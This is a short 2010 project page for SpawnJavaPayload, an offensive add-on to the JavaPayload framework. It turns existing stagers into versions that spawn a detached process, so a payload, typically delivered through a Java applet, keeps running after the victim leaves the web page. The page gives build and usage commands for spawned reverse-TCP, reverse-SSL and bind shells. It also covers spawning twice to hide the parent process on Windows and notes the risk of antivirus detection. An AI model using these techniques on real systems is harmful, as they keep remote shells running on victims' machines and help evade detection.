© 2010 Michael 'mihi' Schierl, <schierlm at users dot sourceforge dot net>
Download SpawnJavaPayload-0.1.zip (both source and compiled classes, 19 KB)
Based on/Requires JavaPayload 0.2
The JavaPayloads contain useful payloads written in pure Java. But there is one drawback when using them: Often Java is embedded into other systems (like web browsers), and when the user stops using your web site, your payload will be killed.
Therefore, this archive provides a general framework to dynamically create stagers that will not run inside the victim process, but spawn a new process and run inside that one. This won't work for some stagers, like JDWPTunnel, that depend on some external state of the process they are loaded into, but any other stager that can build standalone class files can be used.
There is one drawback as well: As the new process will have to load the class from disk, your stager will be dumped to disk (and deleted later), which may increase the risk of antivirus detection. On the other hand, in the main usage scenario for these stagers - Java applets - the applet has been stored to disk anyway (in the browser cache and/or the Java plugin cache).
Same as JavaPayload. JRE 1.2 on the victim machine is enough :-)
To use SpawnJavaPayload, you will have to have the same libraries on the classpath as you need for JavaPayload, including ASM and JavaPayload.jar, and additionally you have to add SpawnJavaPayload.jar.
Next, you have to create new stagers for all the stagers you want to "convert". To convert all the standard stagers shipped with JavaPayload 0.2, you can use this command:
java javapayload.builder.SpawnStagerBuilder ReverseTCP ReverseSSL BindTCP BindMultiTCP
This will create a file called SpawnStagers.jar that contains new stagers whose names start with Spawn, like SpawnBindTCP. After adding them to the class path, they can be used like any other stagers, for example:
java javapayload.handler.stager.StagerHandler SpawnReverseTCP localhost # -- JSh
java javapayload.loader.StandaloneLoader SpawnReverseTCP localhost 1687 -- JSh
You can even use these spawn stagers and create stagers from them that spawn once more. This can be useful on systems (like Windows) where the parent process information is lost when the parent process dies. Spawning twice will create a process that is not related to any other process.
copy SpawnStagers.jar SpawnStagers2.jar
set CLASSPATH=SpawnStagers2.jar;%CLASSPATH%
java javapayload.builder.SpawnStagerBuilder SpawnReverseTCP SpawnReverseSSL SpawnBindTCP SpawnBindMultiTCP
java javapayload.handler.stager.StagerHandler SpawnSpawnReverseTCP localhost # -- JSh
java javapayload.loader.StandaloneLoader SpawnSpawnReverseTCP localhost 1687 -- JSh